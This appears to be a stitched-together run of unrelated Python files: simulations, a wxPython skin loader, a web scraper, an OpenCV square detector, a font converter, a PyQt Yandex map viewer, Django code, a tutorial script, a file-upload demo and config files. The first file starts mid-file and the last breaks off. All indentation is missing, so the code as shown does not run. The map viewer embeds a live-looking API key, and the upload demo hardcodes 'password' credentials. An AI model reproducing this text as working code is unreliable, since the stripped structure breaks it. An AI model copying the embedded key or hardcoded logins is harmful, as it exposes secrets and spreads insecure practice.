def plot_poly(x,y,r,pts,offset=0,**kwargs):
c.create_polygon(sum(
(list(pos_to_pix(x+r*cos(2*pi*(t+offset)/pts),
y+r*sin(2*pi*(t+offset)/pts)))
for t in range(pts)), start=[]), **kwargs)
def draw_light():
global a
global b
k = .14
n = 30
for x in range(-n, n):
x *= k
for y in range(-n, n):
y *= k
light = int(light_at(x,y)*255) if (x or y) else 255
if light:
plot_poly(x,y,k/sqrt(2)+.01,4,.5,
fill='#{0:02x}{0:02x}{0:02x}'.format(light))
c.create_rectangle(0,0,g.size,g.size,fill='black')
draw_light()
class Entity:
def __init__(self,x,y,size):
self.x = x
self.y = y
self.size = size
def draw_entity(e):
plot_poly(e.x, e.y, e.size, 10, fill='#1f1')
entities = []
while True:
entities.append(Entity(random.gauss(0,1), random.gauss(0,1),.01))
for e in entities:#Growth
light = light_at(e.x, e.y)
size = e.size
e.size += g.dt*size*(light-size)
for e in entities:
for f in entities:
if e is not f and e.size <= f.size and \
hypot(e.x-f.x, e.y-f.y) < e.size+f.size:
e.size = e.size+.5*f.size
f.size = 0
entities = [e for e in entities if e.size > 0]
draw_light()
for e in entities:
draw_entity(e)
c.update()
time.sleep(g.dt)
print("Complete")
|
'''
Skin management
'''
from __future__ import with_statement
from wx import Image, BITMAP_TYPE_ANY, BitmapFromImage, GetApp, ImageFromString
from path import path
from logging import getLogger; log = getLogger('skin')
from types import FunctionType
from util.data_importer import zipopen
from util.primitives import Storage
import time
class SkinException(Exception):
'Thrown when the structure of a skin file is invalid.'
def skinpath(name, exc = True):
respaths = GetApp().skin.paths
return skinfile(name, respaths, exc)
def skinfile(name, paths, exc = True):
#fast loop
for p in reversed(paths):
imgpath = p / name
if imgpath.isfile():
return imgpath
#slow loop
for p in reversed(paths):
imgpath = p / name
try:
foo = zipopen(imgpath).read()
except Exception:
pass
else:
if foo is not None:
return imgpath
if exc:
raise SkinException('could not find skinfile %s (paths: %r)' % (name, paths))
else:
return None
def basepath(name, exc = True):
path = GetApp().skin.path
return skinfile(name, paths=[path], exc=exc)
#from gui.skin import skintree
def skininit(pth, skinname = 'default'):
if not hasattr(pth, 'abspath'):
pth = path(pth)
set_resource_paths([pth.abspath()])
global _css_fonts
_css_fonts = None
set_active(skinname)
def reload():
'Reloads the active skin.'
t = time.clock()
from common import pref
global _css_fonts
_css_fonts = None
set_active(pref('appearance.skin'), pref('appearance.variant'), True)
log.info('skin reloaded in %ss', (time.clock() - t))
def set_resource_paths(resource_paths):
'''
Tell the skin system where the resource path is.
This path should contain a "skins" directory.
'''
from gui.skin import skintree
skintree.resource_paths = [path(p).abspath() for p in resource_paths]
def get_resource_paths():
'''
Returns the resource path.
'''
from gui.skin import skintree
return skintree.resource_paths
from skintree import set_active, list_skins, skindesc, get as skintree_get
sentinel = object()
def resourcedir():
return get_resource_paths()[0]
class LazyImage(object):
def __init__(self, pth, return_bitmap):
self.pth = pth
self.return_bitmap = return_bitmap
def _lazy_skin_load(self):
return _loadimage(self.pth, return_bitmap = self.return_bitmap)
def Ok(self):
return True
class SkinStorage(Storage):
'''
lazy loads skin images
'''
def __getitem__(self, key, gi = dict.__getitem__):
return self._lazy_load(key, gi(self, key))
def get(self, key, default=sentinel):
if default is sentinel:
val = Storage.get(self, key)
else:
val = Storage.get(self, key, default)
return self._lazy_load(key, val)
def _lazy_load(self, key, val):
if hasattr(val, '_lazy_skin_load'):
img = val._lazy_skin_load()
self[key] = img
return img
else:
return val
def __getattr__(self, key, ga = dict.__getattribute__, gi = __getitem__):
try:
return ga(self, key)
except AttributeError:
try:
return gi(self, key)
except KeyError:
msg = repr(key)
if len(self) <= 20:
keys = sorted(self.keys())
msg += '\n (%d existing keys: ' % len(keys) + str(keys) + ')'
raise AttributeError, msg
def get(dotted_path, default = sentinel):
if dotted_path.startswith('skin:'):
dotted_path = dotted_path[5:]
v = skintree_get(dotted_path, default = default)
if v is sentinel:
raise SkinException('not found: "%s"' % dotted_path)
elif v is default:
return v() if isinstance(v, FunctionType) else v
else:
return v
def load_bitmap(name, return_bitmap = True):
return LazyImage(skinpath(name), return_bitmap)
#return _loadimage(skinpath(name), return_bitmap = return_bitmap)
def load_image(name):
return load_bitmap(name, False)
def _loadimage(path, return_bitmap = False):
try:
if path.isfile():
img = Image(path, BITMAP_TYPE_ANY)
else:
f = None
try:
f = zipopen(path)
if f is None:
raise IOError('Image ' + path + ' does not exist')
img = ImageFromString(f.read())
finally:
if f is not None:
f.close()
if not img.HasAlpha():
img.InitAlpha()
val = img if not return_bitmap else BitmapFromImage(img)
val.path = path
return val
except Exception, err:
raise AssertionError(err)
import urllib2
try:
urllib2.urlopen('') # ensure an opener is present
except Exception, e:
pass
class SkinHandler(urllib2.BaseHandler):
def skin_open(self, req):
from util import Storage
val = get(req.get_host())
return Storage(read=lambda:val)
urllib2._opener.add_handler(SkinHandler())
from gui.skin.skinobjects import Margins
ZeroMargins = Margins()
from gui.skin.skinparse import \
makeBrush as brush, \
makeFont as font
font_multiply_factor = 1.0
def build_font_css():
import wx
from gui.textutil import default_font
from util import Point2HTMLSize
h = Storage()
#-------------------------------------------------------------------------------
# Code for TagFont function
#----------------------------------------
h.header = get('infobox.fonts.header', default_font)
h.title = get('infobox.fonts.title', default_font)
h.major = get('infobox.fonts.major', default_font)
h.minor = get('infobox.fonts.minor', default_font)
h.link = get('infobox.fonts.link', default_font)
h.headerfc = get('infobox.fontcolors.header', wx.BLACK).GetAsString(wx.C2S_HTML_SYNTAX)
h.titlefc = get('infobox.fontcolors.title', wx.BLACK).GetAsString(wx.C2S_HTML_SYNTAX)
h.majorfc = get('infobox.fontcolors.major', wx.BLACK).GetAsString(wx.C2S_HTML_SYNTAX)
h.minorfc = get('infobox.fontcolors.minor', lambda: wx.Color(128, 128, 128)).GetAsString(wx.C2S_HTML_SYNTAX)
h.linkfc = get('infobox.fontcolors.link', wx.BLUE).GetAsString(wx.C2S_HTML_SYNTAX)
import io
sio = io.StringIO()
for name in ('major', 'minor', 'header', 'title', 'link'):
writeline = lambda s: sio.write(s+u'\n')
if name == 'link':
sio.write(u'a, ')
writeline('.%s {' % name)
writeline('\tcolor: %s;' % getattr(h, '%sfc' % name))
writeline('\tfont-family: "%s";' % h[name].FaceName)
writeline('\tfont-size: %spt;' % h[name].PointSize)
if h[name].Style == wx.ITALIC:
writeline('\tfont-style: italic;')
else:
writeline('\tfont-style: normal;')
if h[name].Weight == wx.BOLD:
writeline('\tfont-weight: bold;')
else:
writeline('\tfont-weight: normal;')
if h[name].Underlined:
writeline('\ttext-decoration: underline;')
else:
writeline('\ttext-decoration: none;')
writeline('}')
return sio.getvalue()
_css_fonts = None
def get_css_fonts():
'''
return some generated CSS related to fonts
'''
global _css_fonts
if _css_fonts is None:
_css_fonts = build_font_css()
return _css_fonts
def get_css_images():
'''
return some generated CSS with stuff related to images (?)
'''
import path
sep1 = get('infobox.shortseparatorimage')
sep2 = get('infobox.longseparatorimage')
return ('''
hr {
border-style: none;
height: %spx;
background: url("%s");
}''' % (sep1.Size.height, path.path(sep1.Path).url())) +\
('''
hr[type="2"] {
border-style: none;
height: %spx;
background: url("%s");
}
''' % (sep2.Size.height, path.path(sep2.Path).url()))
def get_css_layout():
'''
return some generated CSS with stuff related to padding, margins, borders, etc.
'''
pad = get('infobox.margins')
try:
l, t, r, b = pad
except TypeError:
try:
(l, t,), (r, b) = pad, pad
except TypeError:
t = l = b = r = pad
return '''
body {
margin: %spx %spx %spx %spx;
}
''' % (t, r, b, l)
def get_social_css():
import wx
minor_color = get('infobox.fontcolors.minor', lambda: wx.Color(128, 128, 128)).GetAsString(wx.C2S_HTML_SYNTAX)
postrow_hover_color = get('infobox.backgrounds.socialhovercolor', lambda: wx.Color(128, 128, 128)).GetAsString(wx.C2S_HTML_SYNTAX)
return '''
.minor_border {{
border-color: {minor_color};
}}
.social_background_hover:hover {{
background-color: {postrow_hover_color};
}}
.social_background_hover_on {{
background-color: {postrow_hover_color};
}}
'''.format(**locals())
def get_css():
return '\n'.join((get_css_fonts(), get_css_images(), get_css_layout(), get_social_css()))
|
from bs4 import BeautifulSoup
import requests
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8",
"Connection": "close",
"Cookie": "_gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1",
"Referer": "http://www.infoq.com",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 LBBROWSER"
}
url = 'http://www.infoq.com/news'
def craw2(url):
response = requests.get(url, headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
for title_herf in soup.find_all('div',class_='card_data'):
print([title.get('title')
for title in title_herf.find_all('a') if title.get('title')])
craw2(url) |
import cv2
import numpy as np
import os
import argparse
import logging
import zmq
from math import sqrt
log_format = '%(created)f:%(levelname)s:%(message)s'
logging.basicConfig(level=logging.DEBUG, format=log_format) # log to file filename='example.log',
TAG = "square-detector-recog:"
def angle(pt1, pt2, pt0):
dx1 = pt1[0] - pt0[0]
dy1 = pt1[1] - pt0[1]
dx2 = pt2[0] - pt0[0]
dy2 = pt2[1] - pt0[1]
tmp = (dx1*dx1 + dy1*dy1)*(dx2*dx2 + dy2*dy2) + 1e-10
return (dx1*dx2 + dy1*dy2) / sqrt(tmp);
def detect(img, threshold):
height, width, depth = img.shape
timg = img.copy()
pyr = np.zeros((height/2, width/2, depth), np.uint8)
cv2.pyrDown(timg, pyr)
cv2.pyrUp(pyr, timg)
squares = []
N = 11
# creates a kernel
kernel = np.ones((5, 5), np.uint8)
for channel in cv2.split(timg):
for level in range(N):
gray = None
if level == 0:
gray = cv2.Canny(channel, 0, threshold, apertureSize=5)
gray = cv2.dilate(gray, kernel)
else:
ret, gray = cv2.threshold(channel, (level+1)*255/N, 255, cv2.THRESH_BINARY)
contours, h = cv2.findContours(gray, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
for contour in contours:
epsilon = cv2.arcLength(contour, True)*0.02
poly = cv2.approxPolyDP(contour, epsilon, closed=True)
area = cv2.contourArea(poly)
poly_double = poly.astype(np.float64)
if len(poly) == 4 and abs(area) > 1000 and cv2.isContourConvex(poly):
s = 0
for i in range(2, 4):
t = abs(angle(poly_double[i][0], poly_double[i-2][0], poly_double[i-1][0]))
s = s if s > t else t
if s < 0.3:
squares.append((poly[0], poly[2]))
return squares
def main(capture, sandbox_send, sandbox_recv, files=None):
logging.debug(TAG + "inside main")
# Default options
options = {'Threshold': 50}
# Set up poller to async check our recv socket
poller = zmq.Poller()
poller.register(sandbox_recv, zmq.POLLIN)
frame_num = 0
while True:
# Read in from recv socket (might not have anything)
socks = dict(poller.poll(1))
if socks.get(sandbox_recv) == zmq.POLLIN:
options = sandbox_recv.recv_json()
logging.debug(TAG + "received options update from proxy")
logging.debug(TAG + "before reading frame")
retval, frame = capture.read()
if not retval:
break # end of video
logging.debug(TAG + "after reading frame")
frame_num += 1
squares = detect(frame, options['Threshold'])
logging.debug(TAG + "sending obj:num %d" % frame_num)
sandbox_send.send_pyobj((frame_num, squares))
return True |
#!/usr/bin/env python3
import sys, re
from collections import OrderedDict
from math import *
from optparse import OptionParser
from PIL import Image
def jisx0208_to_shiftjis(code):
if code >= 0x2121:
row = (code >> 8 & 0xFF) - 0x21
col = (code & 0xFF) - 0x20
code -= 0x2121 + row * 161
code += (row // 2 - 1) * 66
if row % 2 == 0 and col >= 64:
code += 1
return code + 0x8140
else:
return code
if __name__ == '__main__':
parser = OptionParser(usage="Usage: %prog <filename> <outputfile> [--jis-to-sjis]")
parser.add_option('--jis-to-sjis', action='store_true', dest='jis_to_sjis', default=False, help="convert encoding from JIS to SJIS")
parser.add_option('--offset', dest='offset', default=0, help="Add character offsets to output image.")
(options, args) = parser.parse_args()
if len(args) != 2:
sys.stderr.write("Input and output files must be specified.\n")
sys.exit(-1)
inputFile = args[0]
outputFile = args[1]
try:
with open(inputFile) as f:
inputData = f.read()
except OSError:
sys.stderr.write("Could not open '%s'." % args[0])
syntax = "FONT_{}\n{}"
clauseRegex = re.compile(r'STARTCHAR(?s:.+?)ENCODING\s+(\d+)(?s:.+?)BBX\s+(\d+)\s+(\d+)\s+(-*\d+)\s+(-*\d+)\s*\nBITMAP\s*\n((?s:.*?))\n?ENDCHAR\n')
result = {}
maxSize = (0, 0)
for char in clauseRegex.finditer(inputData):
image = []
encoding = char.group(1)
size = (int(char.group(2)), int(char.group(3)))
maxSize = (max(size[0], maxSize[0]), max(size[1], maxSize[1]))
bitmap = char.group(6).split('\n')
if bitmap == ['']:
continue
for line in bitmap:
bitwidth = len(line) * 4
bin = int(line, 16)
for _ in range(-int(char.group(4))):
image.append(0)
for _ in range(-int(char.group(4)), size[0]):
if bin & (0b01 << (bitwidth - 1)):
image.append(255)
else:
image.append(0)
bin = bin << 1
code = int(encoding)
if options.jis_to_sjis:
code = jisx0208_to_shiftjis(code)
result[code] = Image.frombytes('L', size, bytes(image))
result = OrderedDict(sorted(result.items())).items()
resultIter = iter(result)
current = next(resultIter)
first = current[0] - int(options.offset)
rows = ceil((next(reversed(result))[0] - first) / 16)
image = Image.new('L', (maxSize[0] * 16, maxSize[1] * rows))
try:
for row in range(rows):
for col in range(16):
index = 16 * row + col
if index == current[0] - first:
image.paste(current[1], (maxSize[0] * col, maxSize[1] * row))
current = next(resultIter)
except StopIteration:
pass
image.save(outputFile)
|
import os
import sys
import requests
from PyQt5 import uic # Импортируем uic
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QApplication, QMainWindow, QLineEdit, QRadioButton, QLabel
from PyQt5.QtCore import Qt
class MyWidget(QMainWindow):
def __init__(self):
super().__init__()
uic.loadUi('window.ui', self)
self.pushButton.clicked.connect(self.run)
self.pushButton_2.clicked.connect(self.setOff)
self.setOff()
def run(self):
place = self.lineEdit.text()
response = requests.get(
f"https://geocode-maps.yandex.ru/1.x/?apikey=40d1649f-0493-4b70-98ba-98533de7710b&geocode={place}&format=json")
response = response.json()
response = response["response"]["GeoObjectCollection"]["featureMember"][0]["GeoObject"]
address = response["metaDataProperty"]["GeocoderMetaData"]["text"]
postal = response["metaDataProperty"]["GeocoderMetaData"]["Address"]['postal_code']
self.coords = response["Point"]["pos"]
self.pt = self.coords
if self.radioButton.isChecked():
self.address.setText(f"{address}, {postal}")
else:
self.address.setText(f"{address}")
self.getImage()
def getImage(self, ispt=True):
map_request = f"http://static-maps.yandex.ru/1.x/?ll={','.join(self.coords.split())}&spn={self.spn},{self.spn}&l={self.layer}"
if ispt:
map_request += f"&pt={self.pt.split(' ')[0]},{self.pt.split(' ')[1]}"
print(map_request)
response = requests.get(map_request)
if not response:
print("Ошибка выполнения запроса:")
print(map_request)
print("Http статус:", response.status_code, "(", response.reason, ")")
sys.exit(1)
# Запишем полученное изображение в файл.
self.map_file = "map.png"
with open(self.map_file, "wb") as file:
file.write(response.content)
self.pixmap = QPixmap(self.map_file)
self.img.setPixmap(self.pixmap)
os.remove(self.map_file)
def setOff(self):
self.lineEdit.clear()
self.address.clear()
place = "Курган Гоголя 1"
response = requests.get(
f"https://geocode-maps.yandex.ru/1.x/?apikey=40d1649f-0493-4b70-98ba-98533de7710b&geocode={place}&format=json")
response = response.json()
response = response["response"]["GeoObjectCollection"]["featureMember"][0]["GeoObject"]
address = response["metaDataProperty"]["GeocoderMetaData"]["text"]
self.coords = response["Point"]["pos"]
self.address.setText(f"{address}")
self.pt = self.coords
self.spn = 0.05
self.layer = "map"
self.getImage(False)
def keyPressEvent(self, event):
if event.key() == Qt.Key_PageUp:
self.spn = self.spn * 2
self.spn = min(self.spn, 51.2)
self.getImage()
if event.key() == Qt.Key_PageDown:
self.spn = self.spn / 2
self.spn = max(self.spn, 0.000009765625)
self.getImage()
if event.key() == Qt.Key_Up:
c = [float(i) for i in self.coords.split(" ")]
c[1] += self.spn / 10
c[1] = min(c[1], 85.0)
self.coords = " ".join([str(i) for i in c])
self.getImage()
if event.key() == Qt.Key_Down:
c = [float(i) for i in self.coords.split(" ")]
c[1] -= self.spn / 10
c[1] = max(-85.0, c[1])
self.coords = " ".join([str(i) for i in c])
self.getImage()
if event.key() == Qt.Key_Right:
c = [float(i) for i in self.coords.split(" ")]
c[0] += self.spn / 10
c[0] = min(175, c[0])
self.coords = " ".join([str(i) for i in c])
self.getImage()
def get_click_coord(self, event):
label_width = 600
label_height = 400
pt_0 = float(self.coords.split(' ')[0]) - (self.spn * 2) + self.spn * 4 * (
(event.x() - self.img.x()) / label_width) - (
(label_width / 2 - event.x() - self.img.x()) / 5500 * self.spn)
pt_1 = float(self.coords.split(' ')[1]) + (
self.spn * 450 / label_width) - self.spn * label_width / label_height * (
(event.y() - self.img.y()) / label_height)
self.pt = str(pt_0) + ' ' + str(pt_1)
def mousePressEvent(self, event):
try:
if event.button() == Qt.LeftButton:
self.get_click_coord(event)
self.getImage()
geocoder_api_server = "http://geocode-maps.yandex.ru/1.x/"
geocoder_params = {
"apikey": "40d1649f-0493-4b70-98ba-98533de7710b",
"geocode": f'{self.pt.replace(" ", ",")}',
"format": "json"}
response = requests.get(geocoder_api_server, params=geocoder_params)
if not response:
pass
json_response = response.json()
response_new = json_response["response"]["GeoObjectCollection"]["featureMember"][0]["GeoObject"]
address = response_new["metaDataProperty"]["GeocoderMetaData"]["text"]
self.address.setText(address)
if event.button() == Qt.RightButton:
pass
except Exception as e:
print(e)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = MyWidget()
ex.show()
sys.exit(app.exec_())
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('swimming', '0005_auto_20150329_1702'),
]
operations = [
migrations.AddField(
model_name='athlete',
name='photo',
field=models.ImageField(default=1, upload_to=b''),
preserve_default=False,
),
]
|
print("Hello World")
diva = "jinyc76"
print(diva)
str_raw = r"'\r\n\t\s\""
print(str_raw)
str_multi = """
this is multi\
line\
message
line end add \\ \
shows one line
"""
print(str_multi)
str_multi2 = '''this shows also \
multi line
with quot
'''
print(str_multi2)
str_exe1 = "this is execution "
str_exe2 = "string line"
print(str_exe1*3)
print(str_exe1+str_exe2)
print(dir(str_exe1))
print("Capitalize : ",str_exe2.capitalize())
print("is 'first sound' end with g : ",str_exe2.endswith("e"))
print("join string with 'str_exe2' str : ", str_exe2.join(["multiline","joinline","resultline"]))
list1 = [1,2,3]
list2 = ["a","b","c"]
list3 = list("list element")
list4 = list(list1+list2)
print(list1)
print(list2)
print(list3)
print(list4)
print(list4[2])
print("negative index reverse list3[-1] , list3[-5] : " , list3[-1] , "," , list3[-5])
print(list3*2)
print("list4 to 3th index element list4[:3] : " , list4[:3])
print("list4 from 4th index element list4[4:] : " , list4[4:])
print("list4 from every 1th index element list4[::1] : " , list4[::1])
print("list4[start:stop:step] list4[0:5:2] : ", list4[0:5:2])
print("string like list str_exe1[3:15:3] : ", str_exe1[3:15:3])
if True :
print("Yes True")
if False :
print("No False")
if False :
print("No False")
else:
print("No False Else Place")
ex_num1 = 11
if ex_num1 < 10 :
print("less than 10")
elif ex_num1 >= 10 :
print("more than 10")
else:
print("not number")
print(not True)
print(not False)
t1 = (1,2,3,4,5)
print(3 in t1)
print(7 in t1)
d1 = {"one":1 , "two":2 , "three":3}
print(2 in d1.values())
w1 = d1["three"]
print(w1)
while w1 > 0:
print("w1 is : ",w1)
w1 -=1
for i in range(10):
print(i)
ex_arr = ["aaa" , "bbb" , "ccc"]
for name in ex_arr:
print(name)
ex_d1 = {"name":"test","version":3,"company":"mycompany","like number":7}
for title in ex_d1:
print(title," : ",ex_d1[title])
for k in range(1,30,3):
print(k)
for k in range(10):
if k == 3:
print("find ",k," and end")
break
else:
print(k)
def hello(world):
print("hello",world)
to = "jinyc"
hello(to)
def hello(world):
retVal = "hello"+str(world)
return retVal
retVal = hello("test123")
print(retVal)
def func(number):
def in_func(number):
print(number)
print("in_func")
in_func(number+1)
func(1)
def count_length(word:str , num:int) -> int:
return len(word) * num
print(count_length("jinyc",5))
class cls:
pass
class Diva:
version = "1.0"
def __init__(self,name="diva"):
self.name = name
def song(self , title="song"):
print(self.name+" sing the "+title)
def medley(self):
self.song()
self.song("second song")
self.song("third song")
diva1 = Diva()
diva2 = Diva("aaa")
diva3 = Diva("111")
def print_diva(diva):
print("-----")
print("name : ",diva.name)
print("version : "+diva.version)
print_diva(diva1)
print_diva(diva2)
print_diva(diva3)
voice_diva = Diva("haha")
voice_diva.song()
voice_diva.song("world song")
voice_diva.medley()
Diva.song(voice_diva,"tell your song")
class Calculator:
def adder(a , b):
print(a+b)
Calculator.adder(3,4)
class Heroes(Calculator):
pass
Heroes.adder(1,2)
class Miku(Diva):
def __init__(self,module="class uniform"):
self.module = module
super().__init__("miku")
def dance(self):
print("dancing")
miku = Miku()
print(miku.version)
|
__author__ = 'hodor'
import requests
import json
import constants
def UploadDemo():
response = requests.post(constants.server_url + '/api-token-auth/', {'username': 'evan', 'password' : 'password'})
token = response.json()['token']
header = {}
header['Authorization']= 'Token '+ token
payload = {}
payload['path']= 'files/lulz/'
files = {'file': open('/home/hodor/OneDir/OneDir/Server/Demo/lol.txt', 'rb')}
response = requests.post(constants.server_url + '/UploadFile/', headers=header, files=files, data=payload)
print response.content
def DeleteDemo():
response = requests.post(constants.server_url + '/api-token-auth/', {'username': 'evan', 'password' : 'password'})
token = response.json()['token']
header = {}
header['Authorization']= 'Token '+ token
response = requests.delete(constants.server_url + '/DeleteFile/evan/files/lulz/lol.txt', headers= header)
return response
def DeleteUser():
response = requests.post(constants.server_url + '/api-token-auth/', {'username': 'admin', 'password' : 'password'})
token = response.json()['token']
header = {}
header['Authorization']= 'Token '+ token
response = requests.delete(constants.server_url + '/DeleteUser/evan', headers= header)
return response
if __name__ == '__main__':
UploadDemo()
#deleteTest = DeleteDemo()
#print deleteTest.content
response = DeleteUser()
print response.content |
import itertools
import pygame
# Custom modules
import colors as c
COLORDICT = {
'white': c.WHITE
}
# GUI parameters
BACKGROUND = c.BLACK
FPS = 60
FONTNAME = 'Arial'
FONTSIZE = 40
CAPTION = 'Reaction time experiment'
SCREEN_SIZE = (800, 600)
# Session parameters
DEFAULT_NAME = 'A_girl_has_no_name'
DEFAULT_SESSION = 'Infinity'
DEFAULT_RATE = 3.0
DEFAULT_WRITE = True
# Experimental set-up
# Possible text stimuli
WORDS = {
'A': [u'', u'A'],
'B': ['A', 'B'],
'C': ['A', 'B']
}
# Possible colors of text stimuli
COLORS = ['white']
# Possible phases
PHASES = itertools.cycle(['A', 'B', 'C'])
# Response options
BUTTONS = {
'A': {
'first': {
'bounds': pygame.Rect(350, 450, 100, 100),
'state': 'normal',
'reinforced_if': 'A',
'color_dict': {
'normal': c.RED1,
'hover': c.RED2,
'pressed': c.RED3,
}
}
},
'B': {
'first': {
'bounds': pygame.Rect(250, 450, 100, 100),
'state': 'normal',
'reinforced_if': 'A',
'color_dict': {
'normal': c.RED1,
'hover': c.RED2,
'pressed': c.RED3,
}
},
'second': {
'bounds': pygame.Rect(450, 450, 100, 100),
'state': 'normal',
'reinforced_if': 'B',
'color_dict': {
'normal': c.GREEN1,
'hover': c.GREEN2,
'pressed': c.GREEN3,
}
}
},
'C': {
'first': {
'bounds': pygame.Rect(350, 450, 100, 100),
'state': 'normal',
'reinforced_if': 'A',
'color_dict': {
'normal': c.RED1,
'hover': c.RED2,
'pressed': c.RED3,
}
}
}
}
# Stimuli presented
STIMULI = {
'first': {
'text': u'',
'color': 'white',
'pos': (400, 300)
}
}
# Score counter
SCORE = {
'pos': (100, 100),
'color': 'white'
}
# Custom event to trigger changes in stimuli
CHANGE_STIMULI = pygame.USEREVENT + 1
# List to store collected data
DATA = [['time', 'responses', 'score', 'phase_name', 'phase_id', 'rate']] |
"""
EnsembleStat: Using Python Embedding
=============================================================================
met_tool_wrapper/EnsembleStat/EnsembleStat_python
_embedding.conf
"""
############################################################################
# Scientific Objective
# --------------------
#
# To provide useful statistical information on the relationship between
# observation data (in both grid and point formats) to an ensemble forecast.
# These values can be used to help correct ensemble member deviations from observed values.
##############################################################################
# Datasets
# --------
#
# | **Forecast:** Dummy text files found in the MET shared directory
# | **Observation:** Dummy text files found in the MET shared directory
#
# | **Location:** All of the input data required for this use case can be found in the met_test sample data tarball. Click here to the METplus releases page and download sample data for the appropriate release: https://github.com/dtcenter/METplus/releases
# | The tarball should be unpacked into the directory that you will set the value of INPUT_BASE. See `Running METplus`_ section for more information.
# |
#
##############################################################################
# METplus Components
# ------------------
#
# This use case utilizes the METplus EnsembleStat wrapper to read in files using Python Embedding to demonstrate how to read in data this way.
#
##############################################################################
# METplus Workflow
# ----------------
#
# EnsembleStat is the only tool called in this example. It processes a single run time with two ensemble members. The input data are simple text files with no timing information, so the list of ensembles simply duplicates the same file multiple times to demonstrate how data is read in via Python Embedding.
#
##############################################################################
# METplus Configuration
# ---------------------
#
# METplus first loads all of the configuration files found in parm/metplus_config,
# then it loads any configuration files passed to METplus via the command line
# with the -c option, i.e. -c parm/use_cases/met_tool_wrapper/EnsembleStat/EnsembleStat_python_embedding.conf
#
# .. highlight:: bash
# .. literalinclude:: ../../../../parm/use_cases/met_tool_wrapper/EnsembleStat/EnsembleStat_python_embedding.conf
##############################################################################
# MET Configuration
# -----------------
#
#
# METplus sets environment variables based on user settings in the METplus configuration file.
# See :ref:`How METplus controls MET config file settings<metplus-control-met>` for more details.
#
# **YOU SHOULD NOT SET ANY OF THESE ENVIRONMENT VARIABLES YOURSELF! THEY WILL BE OVERWRITTEN BY METPLUS WHEN IT CALLS THE MET TOOLS!**
#
# If there is a setting in the MET configuration file that is currently not supported by METplus you'd like to control, please refer to:
# :ref:`Overriding Unsupported MET config file settings<met-config-overrides>`
#
# .. note:: See the :ref:`EnsembleStat MET Configuration<ens-stat-met-conf>` section of the User's Guide for more information on the environment variables used in the file below:
#
# .. highlight:: bash
# .. literalinclude:: ../../../../parm/met_config/EnsembleStatConfig_wrapped
##############################################################################
# Python Embedding
# ----------------
#
# This use case calls a Python script to read the input data.
# The Python script is stored in the MET repository: /path/to/MET/installation/share/met/python/read_ascii_numpy.py
#
# `read_ascii_numpy.py <https://github.com/dtcenter/MET/blob/develop/scripts/python/read_ascii_numpy.py>`_
##############################################################################
# Running METplus
# ---------------
#
# It is recommended to run this use case by:
#
# Passing in EnsembleStat_python_embedding.conf then a user-specific system configuration file::
#
# run_metplus.py -c /path/to/METplus/parm/use_cases/met_tool_wrapper/EnsembleStat/EnsembleStat_python_embedding.conf -c /path/to/user_system.conf
#
# The following METplus configuration variables must be set correctly to run this example.:
#
# * **INPUT_BASE** - Path to directory where sample data tarballs are unpacked (See Datasets section to obtain tarballs).
# * **OUTPUT_BASE** - Path where METplus output will be written. This must be in a location where you have write permissions
# * **MET_INSTALL_DIR** - Path to location where MET is installed locally
#
# Example User Configuration File::
#
# [dir]
# INPUT_BASE = /path/to/sample/input/data
# OUTPUT_BASE = /path/to/output/dir
# MET_INSTALL_DIR = /path/to/met-X.Y
#
# **NOTE:** All of these items must be found under the [dir] section.
#
##############################################################################
# Expected Output
# ---------------
#
# A successful run will output the following both to the screen and to the logfile::
#
# INFO: METplus has successfully finished running.
#
# Refer to the value set for **OUTPUT_BASE** to find where the output data was generated.
# Output for this use case will be found in met_tool_wrapper/EnsembleStat/ens_python_embedding (relative to **OUTPUT_BASE**)
# and will contain the following files:
#
# * ensemble_stat_PYTHON_20050807_120000V_ecnt.txt
# * ensemble_stat_PYTHON_20050807_120000V_ens.nc
# * ensemble_stat_PYTHON_20050807_120000V_orank.nc
# * ensemble_stat_PYTHON_20050807_120000V_phist.txt
# * ensemble_stat_PYTHON_20050807_120000V_relp.txt
# * ensemble_stat_PYTHON_20050807_120000V_rhist.txt
# * ensemble_stat_PYTHON_20050807_120000V_ssvar.txt
# * ensemble_stat_PYTHON_20050807_120000V.stat
#
##############################################################################
# Keywords
# --------
#
# .. note::
#
# * EnsembleStatToolUseCase
# * PythonEmbeddingFileUseCase
# * EnsembleAppUseCase
# * ProbabilityGenerationAppUseCase
#
# Navigate to the :ref:`quick-search` page to discover other similar use cases.
#
#
#
# sphinx_gallery_thumbnail_path = '_static/met_tool_wrapper-EnsembleStat.png'
#
|
from django import forms
from .models import TenantDetails
class DateInput(forms.DateInput):
input_type = 'date'
class TenantForm(forms.ModelForm):
class Meta:
model = TenantDetails
fields = [
'first_name',
'last_name',
'pg_name',
'phone_number',
'email',
'address',
'adhar_img',
'pan_img',
'room_no',
'occupatin',
'rent',
'food_required',
'food_amt',
'advance_amt',
'joining_date',
'status',
'vacate_date',
]
widgets = {'joining_date' : DateInput(), 'vacate_date' : DateInput()}
def __init__(self, *args, **kwargs):
super(TenantForm, self).__init__(*args, **kwargs)
self.fields['first_name'].widget.attrs.update({'class' : 'form-control'})
self.fields['first_name'].widget.attrs['required'] = True
self.fields['last_name'].widget.attrs.update({'class' : 'form-control'})
self.fields['pg_name'].widget.attrs.update({'class' : 'form-control'})
self.fields['pg_name'].widget.attrs['required'] = True
self.fields['phone_number'].widget.attrs.update({'class' : 'form-control'})
self.fields['phone_number'].widget.attrs['required'] = True
self.fields['email'].widget.attrs.update({'class' : 'form-control'})
self.fields['email'].widget.attrs['required'] = True
self.fields['address'].widget.attrs.update({'class' : 'form-control'})
self.fields['address'].widget.attrs['required'] = True
self.fields['adhar_img'].widget.attrs.update({'class' : 'form-control'})
#self.fields['adhar_img'].widget.attrs['required'] = True
self.fields['pan_img'].widget.attrs.update({'class' : 'form-control'})
